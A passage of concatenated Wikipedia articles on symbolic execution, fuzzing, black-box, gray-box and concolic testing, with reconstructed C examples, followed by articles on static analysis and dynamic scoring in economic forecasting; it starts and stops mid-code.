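    else                        /* other path: constraint λ * 2 != 12                   */
        printf("OK\n");
    return 0;
}
```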
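The file-handling example referred to above is likewise missing from this extraction. The sketch below is a reconstruction based on the description; the "line 5" and "line 11" cited in the text refer to the original listing, so the comments here mark the corresponding statements instead.

```c
#include <stdio.h>

void write_then_read(int condition) {
    char buf[64] = {0};
    FILE *f = fopen("out.txt", "w+");
    if (f == NULL)
        return;
    if (condition)                               /* the branch the text calls "line 5":       */
        fputs("some data", f);                   /* symbolic execution forks two states here  */
    else
        fputs("some other data", f);
    rewind(f);
    size_t n = fread(buf, 1, sizeof buf - 1, f); /* the read the text calls "line 11": should */
    buf[n] = '\0';                               /* match whichever branch this state took    */
    fclose(f);
    printf("%s\n", buf);
}

int main(void) {
    write_then_read(1);
    return 0;
}
```

If the engine executes the fopen/fputs calls directly, both forked states share the one real file, which is how the interleaved "some datasome other data" result described above can arise.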
https://en.wikipedia.org/wiki/Symbolic_execution
Inprogrammingandsoftware development,fuzzingorfuzz testingis an automatedsoftware testingtechnique that involves providing invalid, unexpected, orrandom dataas inputs to acomputer program. The program is then monitored for exceptions such ascrashes, failing built-in codeassertions, or potentialmemory leaks. Typically, fuzzers are used to test programs that take structured inputs. This structure is specified, such as in afile formatorprotocoland distinguishes valid from invalid input. An effective fuzzer generates semi-valid inputs that are "valid enough" in that they are not directly rejected by the parser, but do create unexpected behaviors deeper in the program and are "invalid enough" to exposecorner casesthat have not been properly dealt with. For the purpose of security, input that crosses atrust boundaryis often the most useful.[1]For example, it is more important to fuzz code that handles a file uploaded by any user than it is to fuzz the code that parses a configuration file that is accessible only to a privileged user. The term "fuzz" originates from a 1988 class project[2]in the graduate Advanced Operating Systems class (CS736), taught by Prof. Barton Miller at theUniversity of Wisconsin, whose results were subsequently published in 1990.[3][4]To fuzz test aUNIXutility meant to automatically generate random input and command-line parameters for the utility. The project was designed to test the reliability of UNIX command line programs by executing a large number of random inputs in quick succession until they crashed. Miller's team was able to crash 25 to 33 percent of the utilities that they tested. They then debugged each of the crashes to determine the cause and categorized each detected failure. To allow other researchers to conduct similar experiments with other software, the source code of the tools, the test procedures, and the raw result data were made publicly available.[5]This early fuzzing would now be called black box, generational, unstructured (dumb or "classic") fuzzing. According to Prof. Barton Miller, "In the process of writing the project description, I needed to give this kind of testing a name. I wanted a name that would evoke the feeling of random, unstructured data. After trying out several ideas, I settled on the term fuzz."[4] A key contribution of this early work was simple (almost simplistic) oracle. A program failed its test if it crashed or hung under the random input and was considered to have passed otherwise. While test oracles can be challenging to construct, the oracle for this early fuzz testing was simple and universal to apply. In April 2012, Google announced ClusterFuzz, a cloud-based fuzzing infrastructure for security-critical components of theChromium web browser.[6]Security researchers can upload their own fuzzers and collect bug bounties if ClusterFuzz finds a crash with the uploaded fuzzer. In September 2014,Shellshock[7]was disclosed as a family ofsecurity bugsin the widely usedUNIXBashshell; most vulnerabilities of Shellshock were found using the fuzzerAFL.[8](Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash toexecute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.[9]) In April 2015, Hanno Böck showed how the fuzzer AFL could have found the 2014 Heartbleed vulnerability.[10][11](TheHeartbleedvulnerability was disclosed in April 2014. 
It is a serious vulnerability that allows adversaries to decipher otherwiseencrypted communication. The vulnerability was accidentally introduced intoOpenSSLwhich implementsTLSand is used by the majority of the servers on the internet.Shodanreported 238,000 machines still vulnerable in April 2016;[12]200,000 in January 2017.[13]) In August 2016, theDefense Advanced Research Projects Agency(DARPA) held the finals of the firstCyber Grand Challenge, a fully automatedcapture-the-flagcompetition that lasted 11 hours.[14]The objective was to develop automatic defense systems that can discover,exploit, andcorrectsoftware flaws inreal-time. Fuzzing was used as an effective offense strategy to discover flaws in the software of the opponents. It showed tremendous potential in the automation of vulnerability detection. The winner was a system called "Mayhem"[15]developed by the team ForAllSecure led byDavid Brumley. In September 2016, Microsoft announced Project Springfield, a cloud-based fuzz testing service for finding security critical bugs in software.[16] In December 2016, Google announced OSS-Fuzz which allows for continuous fuzzing of several security-critical open-source projects.[17] At Black Hat 2018, Christopher Domas demonstrated the use of fuzzing to expose the existence of a hiddenRISCcore in a processor.[18]This core was able to bypass existing security checks to executeRing 0commands from Ring 3. In September 2020,MicrosoftreleasedOneFuzz, aself-hostedfuzzing-as-a-service platform that automates the detection ofsoftware bugs.[19]It supportsWindowsand Linux.[20]It has been archived three years later on November 1st, 2023.[21] Testing programs with random inputs dates back to the 1950s when data was still stored onpunched cards.[22]Programmers would use punched cards that were pulled from the trash or card decks of random numbers as input to computer programs. If an execution revealed undesired behavior, abughad been detected. The execution of random inputs is also calledrandom testingormonkey testing. In 1981, Duran and Ntafos formally investigated the effectiveness of testing a program with random inputs.[23][24]While random testing had been widely perceived to be the worst means of testing a program, the authors could show that it is a cost-effective alternative to more systematic testing techniques. In 1983,Steve Cappsat Apple developed "The Monkey",[25]a tool that would generate random inputs forclassic Mac OSapplications, such asMacPaint.[26]The figurative "monkey" refers to theinfinite monkey theoremwhich states that a monkey hitting keys at random on a typewriter keyboard for an infinite amount of time will eventually type out the entire works of Shakespeare. In the case of testing, the monkey would write the particular sequence of inputs that would trigger a crash. In 1991, the crashme tool was released, which was intended to test the robustness of Unix andUnix-likeoperating systemsby randomly executing systems calls with randomly chosen parameters.[27] A fuzzer can be categorized in several ways:[28][1] A mutation-based fuzzer leverages an existing corpus of seed inputs during fuzzing. It generates inputs by modifying (or rathermutating) the provided seeds.[29]For example, when fuzzing the image librarylibpng, the user would provide a set of validPNGimage files as seeds while a mutation-based fuzzer would modify these seeds to produce semi-valid variants of each seed. The corpus of seed files may contain thousands of potentially similar inputs. 
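As a rough illustration of the mutation step just described, the following sketch applies random bit flips and byte substitutions to a seed buffer. It is a deliberately dumb mutator in the spirit of the description, not the actual algorithm of AFL or any other named tool, and the sample seed is invented.

```c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

/* Mutate a buffer in place: flip a random bit or overwrite a random byte,
   repeated n_mutations times. */
static void mutate(unsigned char *buf, size_t len, int n_mutations) {
    if (len == 0)
        return;
    for (int i = 0; i < n_mutations; i++) {
        size_t pos = (size_t)rand() % len;
        if (rand() % 2)
            buf[pos] ^= (unsigned char)(1u << (rand() % 8));  /* flip one bit        */
        else
            buf[pos] = (unsigned char)(rand() % 256);         /* substitute the byte */
    }
}

int main(void) {
    unsigned char seed[] = "a tiny illustrative seed input";
    srand((unsigned)time(NULL));
    mutate(seed, sizeof seed - 1, 4);
    fwrite(seed, 1, sizeof seed - 1, stdout);  /* a real fuzzer would feed this to the target */
    return 0;
}
```

Each mutated buffer would then be handed to the program under test, for example written out as a candidate image file in the libpng scenario mentioned above.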
Automated seed selection (or test suite reduction) allows users to pick the best seeds in order to maximize the total number of bugs found during a fuzz campaign.[30] A generation-based fuzzer generates inputs from scratch. For instance, a smart generation-based fuzzer[31]takes the input model that was provided by the user to generate new inputs. Unlike mutation-based fuzzers, a generation-based fuzzer does not depend on the existence or quality of a corpus of seed inputs. Some fuzzers have the capability to do both, to generate inputs from scratch and to generate inputs by mutation of existing seeds.[32] Typically, fuzzers are used to generate inputs for programs that take structured inputs, such as afile, a sequence of keyboard or mouseevents, or a sequence ofmessages. This structure distinguishes valid input that is accepted and processed by the program from invalid input that is quickly rejected by the program. What constitutes a valid input may be explicitly specified in an input model. Examples of input models areformal grammars,file formats,GUI-models, andnetwork protocols. Even items not normally considered as input can be fuzzed, such as the contents ofdatabases,shared memory,environment variablesor the precise interleaving ofthreads. An effective fuzzer generates semi-valid inputs that are "valid enough" so that they are not directly rejected from theparserand "invalid enough" so that they might stresscorner casesand exercise interesting program behaviours. A smart (model-based,[32]grammar-based,[31][33]or protocol-based[34]) fuzzer leverages the input model to generate a greater proportion of valid inputs. For instance, if the input can be modelled as anabstract syntax tree, then a smart mutation-based fuzzer[33]would employ randomtransformationsto move complete subtrees from one node to another. If the input can be modelled by aformal grammar, a smart generation-based fuzzer[31]would instantiate theproduction rulesto generate inputs that are valid with respect to the grammar. However, generally the input model must be explicitly provided, which is difficult to do when the model is proprietary, unknown, or very complex. If a large corpus of valid and invalid inputs is available, agrammar inductiontechnique, such asAngluin's L* algorithm, would be able to generate an input model.[35][36] A dumb fuzzer[37][38]does not require the input model and can thus be employed to fuzz a wider variety of programs. For instance,AFLis a dumb mutation-based fuzzer that modifies a seed file byflipping random bits, by substituting random bytes with "interesting" values, and by moving or deleting blocks of data. However, a dumb fuzzer might generate a lower proportion of valid inputs and stress theparsercode rather than the main components of a program. The disadvantage of dumb fuzzers can be illustrated by means of the construction of a validchecksumfor acyclic redundancy check(CRC). A CRC is anerror-detecting codethat ensures that theintegrityof the data contained in the input file is preserved duringtransmission. A checksum is computed over the input data and recorded in the file. When the program processes the received file and the recorded checksum does not match the re-computed checksum, then the file is rejected as invalid. Now, a fuzzer that is unaware of the CRC is unlikely to generate the correct checksum. 
However, there are attempts to identify and re-compute a potential checksum in the mutated input, once a dumb mutation-based fuzzer has modified the protected data.[39] Typically, a fuzzer is considered more effective if it achieves a higher degree ofcode coverage. The rationale is, if a fuzzer does not exercise certain structural elements in the program, then it is also not able to revealbugsthat are hiding in these elements. Some program elements are considered more critical than others. For instance, a division operator might cause adivision by zeroerror, or asystem callmay crash the program. Ablack-boxfuzzer[37][33]treats the program as ablack boxand is unaware of internal program structure. For instance, arandom testingtool that generates inputs at random is considered a blackbox fuzzer. Hence, a blackbox fuzzer can execute several hundred inputs per second, can be easily parallelized, and can scale to programs of arbitrary size. However, blackbox fuzzers may only scratch the surface and expose "shallow" bugs. Hence, there are attempts to develop blackbox fuzzers that can incrementally learn about the internal structure (and behavior) of a program during fuzzing by observing the program's output given an input. For instance, LearnLib employsactive learningto generate anautomatonthat represents the behavior of a web application. Awhite-boxfuzzer[38][32]leveragesprogram analysisto systematically increasecode coverageor to reach certain critical program locations. For instance, SAGE[40]leveragessymbolic executionto systematically explore different paths in the program (a technique known asconcolic execution). If theprogram's specificationis available, a whitebox fuzzer might leverage techniques frommodel-based testingto generate inputs and check the program outputs against the program specification. A whitebox fuzzer can be very effective at exposing bugs that hide deep in the program. However, the time used for analysis (of the program or its specification) can become prohibitive. If the whitebox fuzzer takes relatively too long to generate an input, a blackbox fuzzer will be more efficient.[41]Hence, there are attempts to combine the efficiency of blackbox fuzzers and the effectiveness of whitebox fuzzers.[42] Agray-boxfuzzer leveragesinstrumentationrather than program analysis to glean information about the program. For instance, AFL and libFuzzer utilize lightweight instrumentation to tracebasic blocktransitions exercised by an input. This leads to a reasonable performance overhead but informs the fuzzer about the increase in code coverage during fuzzing, which makes gray-box fuzzers extremely efficient vulnerability detection tools.[43] Fuzzing is used mostly as an automated technique to exposevulnerabilitiesin security-critical programs that might beexploitedwith malicious intent.[6][16][17]More generally, fuzzing is used to demonstrate the presence of bugs rather than their absence. Running a fuzzing campaign for several weeks without finding a bug does not prove the program correct.[44]After all, the program may still fail for an input that has not been executed, yet; executing a program for all inputs is prohibitively expensive. If the objective is to prove a program correct for all inputs, aformal specificationmust exist and techniques fromformal methodsmust be used. In order to expose bugs, a fuzzer must be able to distinguish expected (normal) from unexpected (buggy) program behavior. However, a machine cannot always distinguish a bug from a feature. 
In automated software testing, this is also called the test oracle problem.[45][46] Typically, a fuzzer distinguishes between crashing and non-crashing inputs in the absence of specifications, in order to use a simple and objective measure. Crashes can be easily identified and might indicate potential vulnerabilities (e.g., denial of service or arbitrary code execution). However, the absence of a crash does not indicate the absence of a vulnerability. For instance, a program written in C may or may not crash when an input causes a buffer overflow; rather, the program's behavior is undefined. To make a fuzzer more sensitive to failures other than crashes, sanitizers can be used to inject assertions that crash the program when a failure is detected.[47][48] Different sanitizers target different kinds of bugs, such as memory errors, data races, and undefined behavior. Fuzzing can also be used to detect "differential" bugs if a reference implementation is available. For automated regression testing,[49] the generated inputs are executed on two versions of the same program. For automated differential testing,[50] the generated inputs are executed on two implementations of the same program (e.g., lighttpd and httpd are both implementations of a web server). If the two variants produce different output for the same input, then one may be buggy and should be examined more closely. Static program analysis analyzes a program without actually executing it. This might lead to false positives where the tool reports problems with the program that do not actually exist. Fuzzing in combination with dynamic program analysis can be used to try to generate an input that actually witnesses the reported problem.[51] Modern web browsers undergo extensive fuzzing. The Chromium code of Google Chrome is continuously fuzzed by the Chrome Security Team with 15,000 cores.[52] For Microsoft Edge [Legacy] and Internet Explorer, Microsoft performed fuzz testing with 670 machine-years during product development, generating more than 400 billion DOM manipulations from 1 billion HTML files.[53][52] A fuzzer produces a large number of inputs in a relatively short time. For instance, in 2016 the Google OSS-Fuzz project produced around 4 trillion inputs a week.[17] Hence, many fuzzers provide a toolchain that automates otherwise manual and tedious tasks which follow the automated generation of failure-inducing inputs. Automated bug triage is used to group a large number of failure-inducing inputs by root cause and to prioritize each individual bug by severity. A fuzzer produces a large number of inputs, and many of the failure-inducing ones may effectively expose the same software bug. Only some of these bugs are security-critical and should be patched with higher priority. For instance, the CERT Coordination Center provides Linux triage tools which group crashing inputs by the produced stack trace and rank each group according to the probability that it is exploitable.[54] The Microsoft Security Research Centre (MSEC) developed the "!exploitable" tool, which first creates a hash for a crashing input to determine its uniqueness and then assigns an exploitability rating such as "exploitable" or "probably not exploitable".[55] Previously unreported, triaged bugs might be automatically reported to a bug tracking system.
For instance, OSS-Fuzz runs large-scale, long-running fuzzing campaigns for several security-critical software projects where each previously unreported, distinct bug is reported directly to a bug tracker.[17] The OSS-Fuzz bug tracker automatically informs the maintainer of the vulnerable software and checks at regular intervals whether the bug has been fixed in the most recent revision, using the uploaded minimized failure-inducing input. Automated input minimization (or test case reduction) is an automated debugging technique to isolate the part of the failure-inducing input that is actually inducing the failure.[56][57] If the failure-inducing input is large and mostly malformed, it might be difficult for a developer to understand what exactly is causing the bug. Given the failure-inducing input, an automated minimization tool removes as many input bytes as possible while still reproducing the original bug (a naive version is sketched below). For instance, Delta Debugging is an automated input minimization technique that employs an extended binary search algorithm to find such a minimal input.[58] Fuzzers described in the academic literature as "popular", "widely used", or similar include tools such as AFL and libFuzzer.[59][60]
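To illustrate the input-minimization idea just described, here is a naive sketch that repeatedly tries to delete chunks of a failure-inducing input and keeps any deletion that still reproduces the failure. It is a simplification in the spirit of delta debugging, not the published ddmin algorithm, and the still_fails predicate is a stand-in: a real harness would run the target program.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in predicate for this sketch: pretend the bug triggers whenever the
   input still contains a '!' byte. A real harness would execute the target. */
static int still_fails(const unsigned char *input, size_t len) {
    return memchr(input, '!', len) != NULL;
}

/* Shrink `input` in place; returns the reduced length. */
static size_t minimize(unsigned char *input, size_t len) {
    for (size_t chunk = len / 2; chunk >= 1; ) {
        int reduced = 0;
        for (size_t start = 0; start + chunk <= len; ) {
            unsigned char *trial = malloc(len - chunk + 1);
            if (trial == NULL)
                break;
            memcpy(trial, input, start);
            memcpy(trial + start, input + start + chunk, len - start - chunk);
            if (still_fails(trial, len - chunk)) {
                memcpy(input, trial, len - chunk);   /* keep the smaller input */
                len -= chunk;
                reduced = 1;
            } else {
                start += chunk;                      /* this chunk is needed   */
            }
            free(trial);
        }
        if (!reduced)
            chunk /= 2;                              /* refine the granularity */
    }
    return len;
}

int main(void) {
    unsigned char input[] = "lots of irrelevant bytes ... ! ... and more noise";
    size_t n = minimize(input, sizeof input - 1);
    fwrite(input, 1, n, stdout);                     /* prints a much smaller failing input */
    putchar('\n');
    return 0;
}
```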
https://en.wikipedia.org/wiki/Fuzz_testing
Black-box testing, sometimes referred to as specification-based testing,[1] is a method of software testing that examines the functionality of an application without peering into its internal structures or workings. This method of testing can be applied to virtually every level of software testing: unit, integration, system and acceptance. Black-box testing is also used as a method in penetration testing, where an ethical hacker simulates an external hacking or cyber warfare attack with no knowledge of the system being attacked. Specification-based testing aims to test the functionality of software according to the applicable requirements.[2] This level of testing usually requires thorough test cases to be provided to the tester, who then can simply verify that for a given input, the output value (or behavior) either "is" or "is not" the same as the expected value specified in the test case. Specific knowledge of the application's code, internal structure, and programming knowledge in general is not required.[3] The tester is aware of what the software is supposed to do but is not aware of how it does it. For instance, the tester is aware that a particular input returns a certain, invariable output but is not aware of how the software produces the output in the first place.[4] Test cases are built around specifications and requirements, i.e., what the application is supposed to do. Test cases are generally derived from external descriptions of the software, including specifications, requirements, and design parameters. Although the tests used are primarily functional in nature, non-functional tests may also be used. The test designer selects both valid and invalid inputs and determines the correct output, often with the help of a test oracle or a previous result that is known to be good, without any knowledge of the test object's internal structure. Typical black-box test design techniques include decision table testing, all-pairs testing, equivalence partitioning, boundary value analysis, cause–effect graph, error guessing, state transition testing, use case testing, user story testing, domain analysis, and syntax testing (a small example of equivalence partitioning with boundary values is sketched at the end of this section).[5][6] Test coverage refers to the percentage of software requirements that are tested by black-box testing for a system or application.[7] This is in contrast with code coverage, which examines the inner workings of a program and measures the degree to which the source code of a program is executed when a test suite is run.[8] Measuring test coverage makes it possible to quickly detect and eliminate defects, to create a more comprehensive test suite, and to remove tests that are not relevant for the given requirements.[8][9] Black-box testing may be necessary to assure correct functionality, but it is insufficient to guard against complex or high-risk situations.[10] An advantage of the black-box technique is that no programming knowledge is required. Whatever biases the programmers may have had, the tester likely has a different set and may emphasize different areas of functionality. On the other hand, black-box testing has been said to be "like a walk in a dark labyrinth without a flashlight."[11] Because testers do not examine the source code, they may write many test cases to check something that could have been tested by only one test case, or leave some parts of the program untested.
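As a small illustration of equivalence partitioning combined with boundary value analysis, consider a hypothetical classify_score function specified to return -1 for inputs outside 0–100, 0 for a fail (0–49), 1 for a pass (50–79), and 2 for a distinction (80–100). The function, its name, and its return codes are invented for this sketch; the stand-in implementation exists only so the example compiles, since a black-box tester would work from the specification alone.

```c
#include <assert.h>

/* Stand-in implementation of the specified behavior (hypothetical). */
static int classify_score(int score) {
    if (score < 0 || score > 100) return -1;
    if (score < 50)  return 0;
    if (score < 80)  return 1;
    return 2;
}

/* Black-box tests: one representative per equivalence class,
   plus the boundary values of each class. */
static void test_classify_score(void) {
    assert(classify_score(-1)  == -1);   /* invalid: below range     */
    assert(classify_score(101) == -1);   /* invalid: above range     */
    assert(classify_score(0)   == 0);    /* fail: lower boundary     */
    assert(classify_score(25)  == 0);    /* fail: representative     */
    assert(classify_score(49)  == 0);    /* fail: upper boundary     */
    assert(classify_score(50)  == 1);    /* pass: lower boundary     */
    assert(classify_score(79)  == 1);    /* pass: upper boundary     */
    assert(classify_score(80)  == 2);    /* distinction: lower bound */
    assert(classify_score(100) == 2);    /* distinction: upper bound */
}

int main(void) {
    test_classify_score();
    return 0;
}
```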
https://en.wikipedia.org/wiki/Black_box_testing
Gray-box testing (International English spelling: grey-box testing) is a combination of white-box testing and black-box testing. The aim of this testing is to search for defects, if any, caused by improper structure or improper usage of applications.[1][2] A black-box tester is unaware of the internal structure of the application to be tested, while a white-box tester has access to the internal structure of the application. A gray-box tester partially knows the internal structure, which includes access to the documentation of internal data structures as well as the algorithms used.[3] Gray-box testers require both high-level and detailed documents describing the application, which they collect in order to define test cases.[4] Gray-box testing is beneficial because it takes the straightforward technique of black-box testing and combines it with the code-targeted systems of white-box testing. Gray-box testing is based on requirement test case generation because it presents all the conditions before the program is tested, by using the assertion method. A requirement specification language is used to make it easy to understand the requirements and to verify their correctness.[5] Object-oriented software consists primarily of objects, where objects are single indivisible units having executable code and/or data. Applying gray-box testing to such software rests on several assumptions about these objects. Cem Kaner defines "gray-box testing as involving inputs and outputs, but test design is educated by information about the code or the program operation of a kind that would normally be out of view of the tester".[9] Gray-box testing encompasses several specific techniques. The distributed nature of Web services allows gray-box testing to detect defects within a service-oriented architecture (SOA). White-box testing is not well suited to Web services because it deals directly with internal structures. White-box techniques can, however, be used for state-of-the-art methods such as message mutation, which generates automatic tests for large arrays to help exercise exception-handling states and flows without source code or binaries. Such a strategy is useful to push gray-box testing nearer to the outcomes of white-box testing.
https://en.wikipedia.org/wiki/Gray_box_testing
Concolic testing(aportmanteauofconcreteandsymbolic, also known asdynamic symbolic execution) is a hybridsoftware verificationtechnique that performssymbolic execution, a classical technique that treats program variables as symbolic variables, along aconcrete execution(testingon particular inputs) path. Symbolic execution is used in conjunction with anautomated theorem proveror constraint solver based onconstraint logic programmingto generate new concrete inputs (test cases) with the aim of maximizingcode coverage. Its main focus is finding bugs in real-world software, rather than demonstrating program correctness. A description and discussion of the concept was introduced in "DART: Directed Automated Random Testing" by Patrice Godefroid, Nils Klarlund, and Koushik Sen.[1]The paper "CUTE: A concolic unit testing engine for C",[2]by Koushik Sen, Darko Marinov, andGul Agha, further extended the idea to data structures, and first coined the termconcolic testing. Another tool, called EGT (renamed to EXE and later improved and renamed to KLEE), based on similar ideas was independently developed by Cristian Cadar andDawson Englerin 2005, and published in 2005 and 2006.[3]PathCrawler[4][5]first proposed to perform symbolic execution along a concrete execution path, but unlike concolic testing PathCrawler does not simplify complex symbolic constraints using concrete values. These tools (DART and CUTE, EXE) applied concolic testing to unit testing ofCprograms and concolic testing was originally conceived as awhite boximprovement upon establishedrandom testingmethodologies. The technique was later generalized to testing multithreadedJavaprograms with jCUTE,[6]and unit testing programs from their executable codes (tool OSMOSE).[7]It was also combined withfuzz testingand extended to detect exploitable security issues in large-scalex86binaries byMicrosoft Research's SAGE.[8][9] The concolic approach is also applicable tomodel checking. In a concolic model checker, the model checker traverses states of the model representing the software being checked, while storing both a concrete state and a symbolic state. The symbolic state is used for checking properties on the software, while the concrete state is used to avoid reaching unreachable states. One such tool is ExpliSAT by Sharon Barner, Cindy Eisner, Ziv Glazberg,Daniel Kroeningand Ishai Rabinovitz[10] Implementation of traditional symbolic execution based testing requires the implementation of a full-fledged symbolic interpreter for a programming language. Concolic testing implementors noticed that implementation of full-fledged symbolic execution can be avoided if symbolic execution can be piggy-backed with the normal execution of a program throughinstrumentation. This idea of simplifying implementation of symbolic execution gave birth to concolic testing. An important reason for the rise of concolic testing (and more generally, symbolic-execution based analysis of programs) in the decade since it was introduced in 2005 is the dramatic improvement in the efficiency and expressive power ofSMT Solvers. The key technical developments that lead to the rapid development of SMT solvers include combination of theories, lazy solving, DPLL(T) and the huge improvements in the speed ofSAT solvers. SMT solvers that are particularly tuned for concolic testing includeZ3, STP, Z3str2, andBoolector. 
Consider the following simple example, written in C (the listing itself is reconstructed after this walkthrough). Simple random testing, trying random values of x and y, would require an impractically large number of tests to reproduce the failure. We begin with an arbitrary choice for x and y, for example x = y = 1. In the concrete execution, line 2 sets z to 2, and the test in line 3 fails since 1 ≠ 100000. Concurrently, the symbolic execution follows the same path but treats x and y as symbolic variables. It sets z to the expression 2y and notes that, because the test in line 3 failed, x ≠ 100000. This inequality is called a path condition and must be true for all executions following the same execution path as the current one. Since we'd like the program to follow a different execution path on the next run, we take the last path condition encountered, x ≠ 100000, and negate it, giving x = 100000. An automated theorem prover is then invoked to find values for the input variables x and y given the complete set of symbolic variable values and path conditions constructed during symbolic execution. In this case, a valid response from the theorem prover might be x = 100000, y = 0. Running the program on this input allows it to reach the inner branch on line 4, which is not taken since 100000 (x) is not less than 0 (z = 2y). The path conditions are x = 100000 and x ≥ z. The latter is negated, giving x < z. The theorem prover then looks for x, y satisfying x = 100000, x < z, and z = 2y; for example, x = 100000, y = 50001. This input reaches the error. Essentially, a concolic testing algorithm repeats this process: execute the program on concrete inputs while collecting symbolic path conditions, negate one of the conditions, and ask a constraint solver for concrete inputs that drive execution down a different path. In practice there are a few complications to this procedure, such as path conditions that the constraint solver cannot handle. Symbolic-execution based analysis and testing, in general, have witnessed a significant level of interest from industry.[citation needed] Perhaps the most famous commercial tool that uses dynamic symbolic execution (aka concolic testing) is the SAGE tool from Microsoft. The KLEE and S2E tools (both of which are open-source tools, and use the STP constraint solver) are widely used in many companies including Micro Focus Fortify, NVIDIA, and IBM.[citation needed] Increasingly, these technologies are being used by many security companies and hackers alike to find security vulnerabilities. Concolic testing also has a number of limitations, such as the path explosion problem discussed above for symbolic execution. Many tools, notably DART and SAGE, have not been made available to the public at large; note, however, that SAGE, for instance, is "used daily" for internal security testing at Microsoft.[13]
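The C listing referenced at the start of the walkthrough above is missing from this extraction. The following reconstruction matches the walkthrough (z is twice y, the outer test compares x with 100000, the inner test compares x with z), though its own line numbers will not coincide with the "line 2/3/4" references in the prose; the comments mark the corresponding statements.

```c
#include <assert.h>

void f(int x, int y) {
    int z = 2 * y;         /* the prose's "line 2": symbolically, z = 2y     */
    if (x == 100000) {     /* "line 3": path condition x == 100000           */
        if (x < z) {       /* "line 4": path condition x < z                 */
            assert(0);     /* error */
        }
    }
}

int main(void) {
    f(100000, 50001);      /* the input found by the solver; triggers the assertion */
    return 0;
}
```

Random testing is unlikely to stumble on x == 100000, whereas the negate-and-solve loop described above reaches the error after only two iterations.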
https://en.wikipedia.org/wiki/Concolic_testing
Static analysis,static projection, orstatic scoringis a simplified analysis wherein the effect of an immediate change to a system is calculated without regard to the longer-term response of the system to that change. If the short-term effect is then extrapolated to the long term, such extrapolation is inappropriate. Its opposite,dynamic analysisor dynamic scoring, is an attempt to take into account how the system is likely to respond to the change over time. One common use of these terms isbudget policyin the United States,[1]although it also occurs in many other statistical disputes. A famous example of extrapolation of static analysis comes fromoverpopulationtheory. Starting withThomas Malthusat the end of the 18th century, various commentators have projected some short-term population growth trend for years into the future, resulting in the prediction that there would be disastrous overpopulation within a generation or two. Malthus himself essentially claimed that British society would collapse under the weight of overpopulation by 1850, while during the 1960s the bookThe Population Bombmade similar dire predictions for the US by the 1980s. For economic policy discussions, predictions that assume no significant change of behavior in response to change in incentives are often termed static projection (and in the US Congressional Budget Office, "static scoring").[citation needed] However, when applied to dynamically responsive systems, static analysis improperly extrapolated tends to produce results that are not only incorrect but opposite in direction to what was predicted, as shown in the following applications.[citation needed] Some have criticized the notion of atechnological singularityas an instance of static analysis:accelerating changein some factor of information growth, such asMoore's lawor computer intelligence, is projected into the future, resulting inexponential growthorhyperbolic growth(to a singularity), that suggests that everything will be known by a relatively early date.[citation needed]
https://en.wikipedia.org/wiki/Static_analysis
Dynamic scoringis a forecasting technique forgovernment revenues, expenditures, andbudget deficitsthat incorporates predictions about the behavior of people and organizations based on changes infiscal policy, usuallytax rates. Dynamic scoring depends on models of the behavior ofeconomic agentswhich predict how they would react once the tax rate or other policy change goes into effect. This means the uncertainty induced in predictions is greater to the degree that the proposed policy is unlike current policy. Unfortunately, any such model depends heavily on judgment, and there is no evidence that it is more effective or accurate.[1] For example, a dynamic scoring model may includeeconometric modelof a transitional phase as the population adapts to the new policy, rather than the so-calledstatic-scoring[2]alternative of standard assumption about behavior of people being immediately and directly sensitive to prices. The outcome of the dynamic analysis is therefore heavily dependent on assumptions about future behaviors and rates of change. The dynamic analysis is potentially more accurate than the alternative, if theeconometricmodel correctly captureshowhouseholds and firms will react to a policy changes. This has been attacked as assumption-driven compared to static scoring which makes simpler assumptions about behavior change due to the introduction of a new policy. Using dynamic scoring has been promoted byRepublican legislatorsto argue thatsupply-sidetax policy, for example theBush tax cutsof 2001[3]and 2011 GOPPath to Prosperityproposal,[4]return higher benefits in terms ofGDPgrowth and revenue increases than are predicted from static scoring. Some economists[5]argue that their dynamic scoring conclusions are overstated,[6]pointing out thatCongressional Budget Office(CBO) practices already include some dynamic scoring elements and that to include more may lead to politicization of the department.[7] On January 6, 2013, the version of thePro-Growth Budgeting Act of 2013included in theBudget and Accounting Transparency Act of 2014passed theUnited States House of Representativesas part of their Rules adopted in House Resolution 5, passed with the exclusive support of theRepublican Party (United States)by a vote of 234-172.[8]The same rules package for the year had other controversial provisions funded.[9]The bill would require theCongressional Budget Officeto use dynamic scoring to provide a macroeconomic impact analysis for bills that are estimated to have a large budgetary effect.[10]The text of the provision read: (a) An estimate provided by the Congressional Budget Office under section 402 of the Congressional Budget Act of 1974 for any major legislation shall, to the extent practicable, incorporate the budgetary effects of changes in economic output, employment, capital stock, and other macroeconomic variables resulting from such legislation. (b) An estimate provided by the Joint Committee on Taxation to the Director of the Congressional Budget Office under section 201(f) of the Congressional Budget Act of 1974 for any major legislation shall, to the extent practicable, incorporate the budgetary effects of changes in economic output, employment, capital stock, and other macroeconomic variables resulting from such legislation. (c) An estimate referred to in this clause shall, to the extent practicable, include-- (d) As used in this clause-- These provisions were removed in January 2019 for the 116th Congress by H. Res. 
6 section 102(u).[12] The Kansas state government cut personal income taxes to stimulate economic growth, depending on optimistic assumptions from dynamic scoring for state revenue. Authors of the plan claimed that "cutting taxes can have a near immediate and permanent impact,"[13] arguing for tax cuts over rebuilding roads or improving the quality of schools. In addition, the tax on "pass-through" businesses was eliminated. After continual revenue deficits, the largest sales tax increase in Kansas history, downgrades from Moody's and Standard & Poor's, and economic performance that lagged neighboring states, the election of 2016 became a referendum on tax policy, and the legislature increased income taxes over the governor's veto.[14][15][16] Kansas's "rainy day" fund reported levels $570 million lower than before the tax cut,[17] even though Kansas had directed more tax revenue to it.
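To make the contrast between static and dynamic scoring concrete, the following toy calculation in C uses entirely hypothetical numbers (they do not come from any CBO or JCT model): the static estimate holds the tax base fixed, while the dynamic estimate applies an assumed behavioral response whose size is precisely the contested judgment.

#include <stdio.h>

/* Toy illustration only: every figure here is hypothetical. */
int main(void) {
    double base = 100.0;      /* assumed taxable base, in billions of dollars */
    double old_rate = 0.20;   /* current tax rate */
    double new_rate = 0.25;   /* proposed tax rate */

    /* Static scoring: behavior is assumed unchanged, so the base stays fixed. */
    double static_estimate = new_rate * base;

    /* Dynamic scoring: an assumed behavioral response shrinks the base as the
       rate rises; the size of this response is exactly the disputed assumption. */
    double assumed_shrinkage = 0.04;   /* hypothetical 4% smaller base */
    double dynamic_estimate = new_rate * base * (1.0 - assumed_shrinkage);

    printf("revenue at old rate:      %.1f\n", old_rate * base);
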